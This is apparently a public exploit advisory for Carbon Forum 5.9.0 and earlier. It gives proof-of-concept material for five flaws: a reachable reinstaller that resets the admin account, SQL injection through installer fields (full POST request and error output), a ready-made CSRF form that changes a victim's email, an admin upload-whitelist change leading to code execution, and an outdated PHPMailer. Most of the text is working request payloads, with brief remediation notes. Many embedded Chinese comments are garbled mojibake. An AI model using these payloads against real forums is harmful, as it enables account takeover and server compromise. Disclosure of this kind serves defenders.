{-} Title => Carbon Forum 5.9.0 - Multiple Exploits {-} Author => bRpsd [cy@Live.no] {-} Release Date => 22 June, 2024 {-} Vendor => Carbon Forum <= 5.9.0 Homepage => https://www.94cb.com/ Download => https://github.com/lincanbin/Carbon-Forum Vulnerable Versions => <= 5.9.0 Tested Version => 5.9.0 on an XAMPP server. ####################################################################################### Vulnerability #1 : Reset Administrator Password & Database Settings File Path: http://localhost/Carbon-Forum/install/ INFO: The install/ directory is left in place after installation, so the installer can be run again by anyone who can reach it: it recreates the database with the submitted settings, and the first user registered afterwards becomes the administrator by default. Removing or access-restricting install/ once setup is complete closes this. ####################################################################################### ####################################################################################### Vulnerability #2 : SQL Injection Vulnerable Code: /Carbon-Forum/install/index.php if ($_SERVER['REQUEST_METHOD'] == 'POST') { $fp = fopen(__DIR__ . '/database.sql', "r") or die("SQLæ–‡ä»¶æ— æ³•æ‰“å¼€ã€‚ The SQL File could not be opened."); //dobefore if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) { $Language = $_POST['Language']; $DBHost = $_POST['DBHost']; $DBName = $_POST['DBName']; $DBUser = $_POST['DBUser']; $DBPassword = $_POST['DBPassword']; $SearchServer = $_POST['SearchServer']; $SearchPort = $_POST['SearchPort']; $EnableMemcache = $_POST['EnableMemcache']; $MemCachePrefix = $_POST['MemCachePrefix']; } else { die("An Unexpected Error Occured!"); } //$WebsitePath = $_POST['WebsitePath']; $WebsitePath = $_SERVER['PHP_SELF'] ? 
$_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) { $WebsitePath = $WebsitePathMatch[1]; } else { $WebsitePath = ''; } //åˆå§‹åŒ–æ•°æ®åº“æ“作类 require('../library/PDO.class.php'); $DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword); $DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName)); if (empty($DatabaseExist)) { $DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";"); } Note that the SCHEMATA lookup binds :DBName as a parameter, while the following CREATE DATABASE statement concatenates $DBName into the query text unquoted; that concatenation is the injection point, and the DB connection itself is opened with the request-supplied DBHost/DBUser/DBPassword. POC Request: POST http://localhost/Carbon-Forum/install/? Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Content-Type: application/x-www-form-urlencoded Content-Length: 173 Origin: http://localhost Connection: keep-alive Referer: http://localhost/Carbon-Forum/install/ Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / Install Response: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1 You can find the error back in the log. 
####################################################################################### ################################################################################################################ Vulnerability #3 : CSRF - Change a user's email address File Path: http://localhost/Carbon-Forum/settings Method: POST Parameter : UserMail Vulnerable Code: Carbon-Forum/controller/settings.php case 'UpdateUserInfo': $CurUserInfo['UserSex'] = intval(Request('POST', 'UserSex', 0)); $CurUserInfo['UserMail'] = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail']; $CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage'])); $CurUserInfo['UserIntro'] = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro'])); $UpdateUserInfoResult = UpdateUserInfo(array( 'UserSex' => $CurUserInfo['UserSex'], 'UserMail' => $CurUserInfo['UserMail'], 'UserHomepage' => $CurUserInfo['UserHomepage'], 'UserIntro' => $CurUserInfo['UserIntro'] )); if ($UpdateUserInfoResult) { $UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully']; The handler takes UserMail straight from the POST body with no anti-CSRF token check, so the profile of a logged-in user who submits the form below is updated. POC (HTML form): <form method='POST' action='http://localhost/Carbon-Forum/settings'> <input type="hidden" name="Action" value="UpdateUserInfo"> <input type="hidden" name="UserSex" value="0"> <input type="hidden" name="UserMail" value="changed@new-email.com"> <input type="hidden" name="UserHomepage" value=""> <input type="hidden" name="UserIntro" value=""> <input type='submit' value='submit'> </form> ################################################################################################################ ####################################################################################### Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated] Info: The allowed upload file types are editable by an administrator in Dashboard -> Parameter (the POST below saves the UploadParameters configuration), so the upload whitelist only restricts non-administrator users. POC (POST request): http://localhost/Carbon-Forum/dashboard#dashboard4 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 
10.15; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Content-Type: application/x-www-form-urlencoded Content-Length: 14662 Origin: http://localhost Connection: keep-alive Referer: http://localhost/Carbon-Forum/dashboard Cookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktop Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Action=Parameter&UploadParameters=/* å‰åŽç«¯é€šä¿¡ç›¸å…³çš„é…ç½®,注释åªå…è®¸ä½¿ç”¨å¤šè¡Œæ–¹å¼ */ { /* ä¸Šä¼ å›¾ç‰‡é…置项 */ "imageActionName": "uploadimage", /* æ‰§è¡Œä¸Šä¼ å›¾ç‰‡çš„actionåç§° */ "imageFieldName": "upfile", /* æäº¤çš„图片表å•åç§° */ "imageMaxSize": 4096000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* ä¸Šä¼ å›¾ç‰‡æ ¼å¼æ˜¾ç¤º */ "imageCompressEnable": true, /* 是å¦åŽ‹ç¼©å›¾ç‰‡,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边é™åˆ¶ */ "imageInsertAlign": "none", /* æ’å…¥çš„å›¾ç‰‡æµ®åŠ¨æ–¹å¼ */ "imageUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ /* (unknown) ä¼šæ›¿æ¢æˆåŽŸæ–‡ä»¶å,é…ç½®è¿™é¡¹éœ€è¦æ³¨æ„䏿–‡ä¹±ç 问题 */ /* {rand:6} ä¼šæ›¿æ¢æˆéšæœºæ•°,åŽé¢çš„æ•°å—æ˜¯éšæœºæ•°çš„使•° */ /* {time} ä¼šæ›¿æ¢æˆæ—¶é—´æˆ³ */ /* {yyyy} ä¼šæ›¿æ¢æˆå››ä½å¹´ä»½ */ /* {yy} ä¼šæ›¿æ¢æˆä¸¤ä½å¹´ä»½ */ /* {mm} ä¼šæ›¿æ¢æˆä¸¤ä½æœˆä»½ */ /* {dd} ä¼šæ›¿æ¢æˆä¸¤ä½æ—¥æœŸ */ /* {hh} ä¼šæ›¿æ¢æˆä¸¤ä½å°æ—¶ */ /* {ii} ä¼šæ›¿æ¢æˆä¸¤ä½åˆ†é’Ÿ */ /* {ss} ä¼šæ›¿æ¢æˆä¸¤ä½ç§’ */ /* éžæ³•å—符 \ : * ? 
" < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* æ¶‚é¸¦å›¾ç‰‡ä¸Šä¼ é…置项 */ "scrawlActionName": "uploadscrawl", /* æ‰§è¡Œä¸Šä¼ æ¶‚é¸¦çš„actionåç§° */ "scrawlFieldName": "upfile", /* æäº¤çš„图片表å•åç§° */ "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "scrawlMaxSize": 2048000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B */ "scrawlUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "scrawlInsertAlign": "none", "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* æˆªå›¾å·¥å…·ä¸Šä¼ */ "snapscreenActionName": "uploadimage", /* æ‰§è¡Œä¸Šä¼ æˆªå›¾çš„actionåç§° */ "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "snapscreenUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "snapscreenInsertAlign": "none", /* æ’å…¥çš„å›¾ç‰‡æµ®åŠ¨æ–¹å¼ */ /* 抓å–远程图片é…ç½® */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓å–远程图片的actionåç§° */ "catcherFieldName": "source", /* æäº¤çš„图片列表表å•åç§° */ "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "catcherUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "catcherMaxSize": 2048000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓å–å›¾ç‰‡æ ¼å¼æ˜¾ç¤º */ /* ä¸Šä¼ è§†é¢‘é…ç½® */ "videoActionName": "uploadvideo", /* æ‰§è¡Œä¸Šä¼ è§†é¢‘çš„actionåç§° */ "videoFieldName": "upfile", /* æäº¤çš„视频表å•åç§° */ "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "videoUrlPrefix": "", /* 视频访问路径å‰ç¼€ */ "videoMaxSize": 20480000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B,默认20MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* ä¸Šä¼ è§†é¢‘æ ¼å¼æ˜¾ç¤º */ /* 
ä¸Šä¼ æ–‡ä»¶é…ç½® */ "fileActionName": "uploadfile", /* controller里,æ‰§è¡Œä¸Šä¼ è§†é¢‘çš„actionåç§° */ "fileFieldName": "upfile", /* æäº¤çš„æ–‡ä»¶è¡¨å•åç§° */ "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "fileUrlPrefix": "", /* 文件访问路径å‰ç¼€ */ "fileMaxSize": 2048000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B,默认2MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* ä¸Šä¼ æ–‡ä»¶æ ¼å¼æ˜¾ç¤º */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管ç†çš„actionåç§° */ "imageManagerListPath": "/upload/image/", /* 指定è¦åˆ—出图片的目录 */ "imageManagerListSize": 60, /* æ¯æ¬¡åˆ—å‡ºæ–‡ä»¶æ•°é‡ */ "imageManagerUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "imageManagerInsertAlign": "none", /* æ’å…¥çš„å›¾ç‰‡æµ®åŠ¨æ–¹å¼ */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管ç†çš„actionåç§° */ "fileManagerListPath": "/upload/file/", /* 指定è¦åˆ—出文件的目录 */ "fileManagerUrlPrefix": "", /* 文件访问路径å‰ç¼€ */ "fileManagerListSize": 60, /* æ¯æ¬¡åˆ—å‡ºæ–‡ä»¶æ•°é‡ */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ }&TextFilterParameter=/* 关键è¯è¿‡æ»¤ç›¸å…³çš„é…ç½®,注释åªå…è®¸ä½¿ç”¨å¤šè¡Œæ–¹å¼ */ { /* 关键è¯å‡æ”¯æŒæ£åˆ™è¡¨è¾¾å¼ï¼Œè¿‡å¤šçš„è¿‡æ»¤ä¼šå½±å“æ€§èƒ½ "fuck" : "f**k", 以上规则表示å‘表å«fuck的内容,会被过滤为f**k "negro" : [false, 30], Don't issue text 
with "negro", or it will freeze for 30 seconds. "蛤" : [false, 30], ä»¥ä¸Šè§„åˆ™ç¦æ¢å‘布å«â€œè›¤â€çš„内容,并且å°è¯•å‘表该内容的用户会被ç»(jin)掉(yan)30秒生命 "negro" : ["black", 30], "包å" : ["ç»´å°¼", 30], 以上规则表示å‘表å«"包å"的内容,会被过滤为"ç»´å°¼",并且在内容å‘表æˆåŠŸåŽï¼Œéœ€è¦å†ç‰30ç§’æ‰èƒ½å‘言 */ /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包å" : ["ç»´å°¼", 30] */ }&submit=Save settings ####################################################################################### ####################################################################################### Vulnerability #5 : Outdated PHPMailer library File: /Carbon-Forum/library/PHPMailer.class.php Bundled Version: $Version = '5.2.16'; (this release predates the upstream security fixes in later PHPMailer versions; updating the bundled library is the remediation) #######################################################################################